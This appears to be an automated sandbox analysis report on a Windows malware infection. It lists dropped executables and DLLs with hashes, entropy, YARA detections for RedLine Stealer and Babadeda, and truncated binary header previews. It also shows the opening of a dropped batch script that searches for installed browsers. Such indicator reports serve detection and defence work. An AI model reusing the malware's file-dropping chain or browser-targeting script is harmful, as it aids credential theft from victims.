Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1939456
Entropy (8bit):	7.9495212303989495
Encrypted:	false
SSDEEP:	49152:rWKMHFWJsNZi1WEzbfyDchLRg2ci2zjYlBwK:rWNlWS0dbfkQL22cJzsrV
MD5:	C6620FE2690605F20F5B9C970E8130C6
SHA1:	F5A500BAB75CEC90F2A004566CC61EF6484BE12C
SHA-256:	EE170A14D676B69CAB768F8A94E482EE9AD6DC1766038D6E26C24FE2CFBD7677
SHA-512:	C9D30D3000F27D6E2A49A6491CE31E371A6235D53E3E22D3B69D50A932F230F1C425C37AD4E64925418B590933FB4F79C391C895F31C91171930696B37AAFBAB
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@.......................... M.....6x....@.................................W...k.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...etmksbbt.....`2..~..................@...iosnleeh......L......r..............@....taggant.0....L.."...v..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\PharmaciesDetection[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	867038
Entropy (8bit):	7.953452448362295
Encrypted:	false
SSDEEP:	24576:TPULtGy0ccUe2jZIneELXUCULPoQg8bXT:zIfcOj4Yv
MD5:	569720E2C07B1D34BAC1366BF2B1C97A
SHA1:	D0C7109E04B413F735BF034CE2CB2F8EE9DAA837
SHA-256:	0DF79273AEA792B72C2218A616B36324E31AAF7DA59271969A23A0C392F58451
SHA-512:	FA83BA4E0B1FA1F746E0FF94CB8F6E4ED9C841C66CC661C6FD28D30919AE657425FE0BB77319CF328A457600E364147C6E9D9140548A068A18A7E2CA0A3A2436
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.......................................@.................................4........@...Y..........>....'......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....Y...@...Z..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	6.026292517681221
Encrypted:	false
SSDEEP:	3072:QcX/GzJvHQn9+skCBqUySy47R2ssdxMXwBF7F8G6gbLYf7H0FF3ad5:X/AJvHQnEayvvf7F8G/3k0vad
MD5:	8E3C2682F9743107CB2B3A3D15B072F5
SHA1:	660A9B6AD3F5CD1BD37E04015B25A893DE4C5F90
SHA-256:	6322686D71A40E20ECA9B41AF872049E06AAB4439A2D06E607E9620DECFEC41D
SHA-512:	CA5C2366993FE09CC8F15ED6985F6E2F688CE11F1BE6ECDC1A6B2DD40B1A1F505781B03236827CF5264AA836D733A59D98560700C8179DA4940748D16079B0FE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Lg.s... ... ... gpQ ... gpd ... gpP l.. .~i ... ... {.. gpU ... gp` ... gpg ... Rich... ........PE..L...lB.d.....................x......L .......0....@..........................`...............................................X..x...................................lY...............................S..@............0...............................text............................... ..`.rdata...2...0...4..................@..@.data........p.......R..............@....yoboy..............................@..@.tezanaz.............2..............@....rsrc................6..............@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.081451547709962
Encrypted:	false
SSDEEP:	3072:aq6EgY6igrUjsgMmwPPoDqeRFSCotTAbtAYKtJcZqf7D341eqiOLibBOU:ZqY6iXwPwuaFjGTARANJcZqf7DIfL
MD5:	4E0235942A9CDE99EE2EE0EE1A736E4F
SHA1:	D084D94DF2502E68EE0443B335DD621CD45E2790
SHA-256:	A0D7BC2CCF07AF7960C580FD43928B5FB02B901F9962EAFB10F607E395759306
SHA-512:	CFC4B7D58F662EE0789349B38C1DEC0C4E6DC1D2E660F5D92F8566D49C4850B2BF1D70E43EDF84DB7B21CB8E316E8BCC3E20B797E32D9668C69A029B15804E3F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.................0.................. ... ....@.. ....................... ............@.................................P...O.... ..............................4................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91648
Entropy (8bit):	6.754699319115407
Encrypted:	false
SSDEEP:	1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfhxiJDe/Oq:Hq6+ouCpk2mpcWJ0r+QNTBfhAhe9
MD5:	5C88DA04EC807C26F6DB500EEB8D983B
SHA1:	DE7CE2AE49182E1C72CAFCA64826569568F3C667
SHA-256:	176F9E2C3645A8742F839B19A56B2DB258C9516D77423A33126266D11AC235EA
SHA-512:	0F8D07D241CC2FFF02E9DB777AE81A28A5C2A4581C431B9B36BCED6A5B563CF40BAA1473319B3F52CA2747E7B87546EF1FE637C99133CB58B0E01FF0CCEAED9C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....V...............0....@.........................................................................\|q......................................................................................pt..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3...0...4..................@..@.data...,....p.......D..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Download File

Process:	C:\Users\user\AppData\RoamingAEGIJKEHCA.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1895424
Entropy (8bit):	7.946319035195088
Encrypted:	false
SSDEEP:	49152:S5WXLsGq0QhKVNxzqwp48K5eyCDUcTDqDYomPW:us85c+GK5eyCDUcTDqMome
MD5:	2985641A4880DB928DCF810EAA14041D
SHA1:	42E4ADE4D2329E61D2EAED9564074B41446F5594
SHA-256:	9104F6DBC8F28E0D3AA82F73D0771550A9652C4F6989013C1D6E0779B52CD6C8
SHA-512:	1767FC695A118AC4D3DC17D547CA3704CDB3A5154899B3AB8E7015D5A08210AACE9DC584CAE34AE3EC26FF2555E61D6277A57CF2269551F5EEC947C03424455D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................J...........@...........................K.....(L....@.................................W...k............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .@*.........................@...owfltkii......0.....................@...lwtisuou......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	6.026292517681221
Encrypted:	false
SSDEEP:	3072:QcX/GzJvHQn9+skCBqUySy47R2ssdxMXwBF7F8G6gbLYf7H0FF3ad5:X/AJvHQnEayvvf7F8G/3k0vad
MD5:	8E3C2682F9743107CB2B3A3D15B072F5
SHA1:	660A9B6AD3F5CD1BD37E04015B25A893DE4C5F90
SHA-256:	6322686D71A40E20ECA9B41AF872049E06AAB4439A2D06E607E9620DECFEC41D
SHA-512:	CA5C2366993FE09CC8F15ED6985F6E2F688CE11F1BE6ECDC1A6B2DD40B1A1F505781B03236827CF5264AA836D733A59D98560700C8179DA4940748D16079B0FE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Lg.s... ... ... gpQ ... gpd ... gpP l.. .~i ... ... {.. gpU ... gp` ... gpg ... Rich... ........PE..L...lB.d.....................x......L .......0....@..........................`...............................................X..x...................................lY...............................S..@............0...............................text............................... ..`.rdata...2...0...4..................@..@.data........p.......R..............@....yoboy..............................@..@.tezanaz.............2..............@....rsrc................6..............@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	867038
Entropy (8bit):	7.953452448362295
Encrypted:	false
SSDEEP:	24576:TPULtGy0ccUe2jZIneELXUCULPoQg8bXT:zIfcOj4Yv
MD5:	569720E2C07B1D34BAC1366BF2B1C97A
SHA1:	D0C7109E04B413F735BF034CE2CB2F8EE9DAA837
SHA-256:	0DF79273AEA792B72C2218A616B36324E31AAF7DA59271969A23A0C392F58451
SHA-512:	FA83BA4E0B1FA1F746E0FF94CB8F6E4ED9C841C66CC661C6FD28D30919AE657425FE0BB77319CF328A457600E364147C6E9D9140548A068A18A7E2CA0A3A2436
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.......................................@.................................4........@...Y..........>....'......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....Y...@...Z..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.081451547709962
Encrypted:	false
SSDEEP:	3072:aq6EgY6igrUjsgMmwPPoDqeRFSCotTAbtAYKtJcZqf7D341eqiOLibBOU:ZqY6iXwPwuaFjGTARANJcZqf7DIfL
MD5:	4E0235942A9CDE99EE2EE0EE1A736E4F
SHA1:	D084D94DF2502E68EE0443B335DD621CD45E2790
SHA-256:	A0D7BC2CCF07AF7960C580FD43928B5FB02B901F9962EAFB10F607E395759306
SHA-512:	CFC4B7D58F662EE0789349B38C1DEC0C4E6DC1D2E660F5D92F8566D49C4850B2BF1D70E43EDF84DB7B21CB8E316E8BCC3E20B797E32D9668C69A029B15804E3F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.................0.................. ... ....@.. ....................... ............@.................................P...O.... ..............................4................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2755072
Entropy (8bit):	6.7088219977074095
Encrypted:	false
SSDEEP:	49152:wXduhClX5Td3dKHJH2u4DTUN8A0AAlFnK9O5JDW0ZX+Gh8e9waVp/EoQ4PKw/n0+:LkUixA0Zea
MD5:	410E91A252FFE557A41E66A174CD6DCB
SHA1:	54B311D2C9909AC9F03D26B30DB6C94DADDE4CDB
SHA-256:	67CE38DEC54FD963FF28F4A257D58133EB241C909F9E06C859DE0A7F00976202
SHA-512:	98B7547A8F41A92899EF018125DF551BDD085AC2444A4542EE9FC1E44388DE6824C5B41600BA8B73FEB97DD882DA0C5A9844EF73509565A3BE3A2DC00C10F06D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..................'.....`.............@..............................0......q...`... ...............................................0.......0.8.....)..L............0..............................n).(...................X.0..............................text.....'.......'.................`..`.data...`.....'.......'.............@....rdata........(.......(.............@..@.pdata...L....)..N...h).............@..@.xdata..0B....)..D....).............@..@.bss.....^... ..........................idata........0.......).............@....CRT....X.....0....................@....tls..........0....................@....rsrc...8.....0....................@..@.reloc........0.......*.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\AppData\RoamingBKKFHIEGDH.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1939456
Entropy (8bit):	7.9495212303989495
Encrypted:	false
SSDEEP:	49152:rWKMHFWJsNZi1WEzbfyDchLRg2ci2zjYlBwK:rWNlWS0dbfkQL22cJzsrV
MD5:	C6620FE2690605F20F5B9C970E8130C6
SHA1:	F5A500BAB75CEC90F2A004566CC61EF6484BE12C
SHA-256:	EE170A14D676B69CAB768F8A94E482EE9AD6DC1766038D6E26C24FE2CFBD7677
SHA-512:	C9D30D3000F27D6E2A49A6491CE31E371A6235D53E3E22D3B69D50A932F230F1C425C37AD4E64925418B590933FB4F79C391C895F31C91171930696B37AAFBAB
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@.......................... M.....6x....@.................................W...k.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...etmksbbt.....`2..~..................@...iosnleeh......L......r..............@....taggant.0....L.."...v..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	946784
Entropy (8bit):	6.628560786473655
Encrypted:	false
SSDEEP:	24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
MD5:	848164D084384C49937F99D5B894253E
SHA1:	3055EF803EEEC4F175EBF120F94125717EE12444
SHA-256:	F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
SHA-512:	AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...\|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\580c62a7-9264-4dea-93d1-2092fde3e2f6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	31335
Entropy (8bit):	7.694019108205432
Encrypted:	false
SSDEEP:	768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
MD5:	6B72597205C77D3E40E1A35BEE403801
SHA1:	6BECEE055C6E057AF9475B6D651B4EE561D02F20
SHA-256:	C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
SHA-512:	7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat

Download File

Process:	C:\Users\user\1000003002\ead6a72944.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2821
Entropy (8bit):	4.949249124498804
Encrypted:	false
SSDEEP:	48:Nd27V5rN81fN80XUbaOUb5OzQ/iqzQ/hXDTjODAKpxVgXDOev0W:j6rrN81fN80Ebanb5OzQ/iqzQ/hTTj+y
MD5:	DE9423D9C334BA3DBA7DC874AA7DBC28
SHA1:	BF38B137B8D780B3D6D62AEE03C9D3F73770D638
SHA-256:	A1E1B422C40FB611A50D3F8BF34F9819F76DDB304AA2D105FB49F41F57752698
SHA-512:	63F13ACD904378AD7DE22053E1087D61A70341F1891ADA3B671223FEC8F841B42B6F1060A4B18C8BB865EE4CD071CADC7FF6BD6D549760945BF1645A1086F401
Malicious:	false
Preview:	@shift /0..@echo off..setlocal....set "URL=https://www.youtube.com/account"....rem Initialize paths..set "chromePath="..set "edgePath="..set "firefoxPath="....rem Hardcoded paths..set "ProgramFiles64=C:\Program Files"..set "ProgramFiles86=C:\Program Files (x86)"....rem Check for Chrome in 64-bit system directory..if exist "%ProgramFiles64%\Google\Chrome\Application\chrome.exe" (.. set "chromePath=%ProgramFiles64%\Google\Chrome\Application\chrome.exe".. goto check_edge..)....rem Check for Chrome in 32-bit system directory..if exist "%ProgramFiles86%\Google\Chrome\Application\chrome.exe" (.. set "chromePath=%ProgramFiles86%\Google\Chrome\Application\chrome.exe".. goto check_edge..)....rem Check for Chrome in user profiles..for /d %%u in ("%SystemDrive%\Users\*") do (.. if exist "%%u\AppData\Local\Google\Chrome\Application\chrome.exe" (.. set "chromePath=%%u\AppData\Local\Google\Chrome\Application\chrome.exe".. goto check_edge.. )..)....:check_edge....rem C

C:\Users\user\AppData\Local\Temp\Assure

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	22528
Entropy (8bit):	6.601653603159352
Encrypted:	false
SSDEEP:	384:8AirRanWcch01t+s6xVw9ZrJrWOLOq4oP335flCKSMlk8WLvChJd/AV5x8y:8ArnWccuUrw9ZrJNLJj33FSGWehzML
MD5:	9C5FAD56FE591AFBCF17FC7210281ECB
SHA1:	D4B89F30059C8BEDD405332B4D13FE5B947D112A
SHA-256:	1ACBD25A8056B2C578AC04E276AD9641403D10D8DBC2257DB22F8BFBEA33EBCD
SHA-512:	8FCA409016E5796CB71C27A8E4AA43CA2641C509B71CC6114758B3D926B4BBD9C0D3951A83EA75359E07F6A7A696EF324B88741F8EE40A378C12FD3BA5D73E08
Malicious:	false
Preview:	....H...t#Q.M..j...O..E.P.I..M....M.....E..H...t#Q.M..qj...O..E.P.I..#....M..y....E..H...t#Q.M..Gj...O..E.P.I.......M..O....E..@..O..e...E..E.P.I..E..........M..$....E....f..t......@..O..e...E..E.P.I .E.........M.......0.I..O..e...E..E.P.I..E......l....M.............N...O..e...E..E.P.I..E......<....M........u..M.Q.O..R.....j....).O..p,...O.j..A....E..A..E.A..M.U.E...X..U.A..E.A..E.A..E......t..M.. Z.....t..M...Z..3..E.$.I..E.].P.].]..]..]..E.......l.I.j.X.].f.E.}...W.P..E..].P.M.]..E......(%...M.....M..E.P.E.L...C...Q.E....@M..PQS.E...P.E.P.E.P.......u.Q.E.PQj..E...P.E.P.E.P......H..D1.8\1.t..@8.U..P..D1.8\1.t..@8.X..E.P...@M...p.I..M..]..]..%....M..E.$.I..#...u..B...Y.M...X..3._^[....U.......SV.M..M.W.Z....d....Z....t....Z...u..}.j.Y3.......M...D...3..F.....S.........Y..y..........}..U..M.j.XW.u.f.E...D...P................SSSj.j.SSj.S....I.j..E.SP.....M..U.........9]........u..M..E......T ..h(.I..M.........u..E..E.E.].]......u.;u.v..E.E...

C:\Users\user\AppData\Local\Temp\Australian

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	6.699139234131258
Encrypted:	false
SSDEEP:	1536:zetdlf8rfKE5Km7wrH9rbjF4vvy1CThsoE:zetHufKE5Kmqd1UhlE
MD5:	A5F9FA23B67D3F24A2248A7ADF0A7B50
SHA1:	FCDE6A9A7EC66B58F35FCF6C4FFB74B55877BD6A
SHA-256:	2C3867A30D2D05C0D877059B96F519772CBBBD2A0D7FD7C7F2268F76F41E2107
SHA-512:	7BD202CAF622665F263E93B4E1B0BA6734E8FF82506EA487FE1840D9DCEAB8BBC70E0B1EED5AB5BF786C97563C9CBC06FAE2AB70A4D8A172BB5634EE1A1D6297
Malicious:	false
Preview:	.:....E..H.....Z........Q....u..E..u..............u..u.h.%J.......u .u..u..}.VW.u.jm.u.................VW...J.S......u .u.VW.u.jd.u........(........VWS......u .u.VW.u.jy.......F.........tv...tJ..........E..@..................j..Y....u...} ......$0f....P.u..u.j..q....E..H.....T........K....} ......$0.m....E..x.......+....x...........j0.u..u.j..p..p..p..........l........u .u..u..}.VW.u.jY.u.................VW.p%J.S......u .u.VW.u.jm.u.......(....V...VWS.....u .u.VW.u.jd......E..H.....~.....;.%...j...R_;...x....$...C..u .u..u..u..u.jH.u..I...............u..u.hx%J..3....u .u..u..u..u.jM.d....E.............<.....u .u..u..}.VW.u.jH.u.................VW.x%J.S......u .u.VW.u.jM.u.......(...._...VWS.....u .u.VW.u.jS......E..H..............~...f..Wu...u.j.Y..I.@.....c...=m.....X...3.;.\|......;.\|.F.} .......0f......P.u..u.j.V.....} ......$0f....P.u..E..u.j..p..p..p..........}....u..u..u..u.j......E..H..........................} ......$0f....P.u...l....u.j..(....}...3..u..k....M.3..u..}.

C:\Users\user\AppData\Local\Temp\Backed

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 21280--27861, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.589205
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	6.202001029100119
Encrypted:	false
SSDEEP:	768:6wsWcfcd0vq6LqgaHbdMNkNDUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vm4uys:6wsWcfcd0vtmgMbFuz08QuklMBNIi9uf
MD5:	E4923AC5C4F0816638E15D99074178BA
SHA1:	DE1CAE1919D7A8A7C8E75EB801D1E6913836C98D
SHA-256:	69C2B3D548A856FC720B433E8745D06F8E1638DAA869889B415797D2E72C4E93
SHA-512:	3548A8D4494E9B68E18394C74F0FF86CDE9904FC064201D8FC9CF06263C8CF0FD91399EEF0684E23C18CFC208F4CAA21F0A3865941DBCD11B36BE2E41DD4E504
Malicious:	false
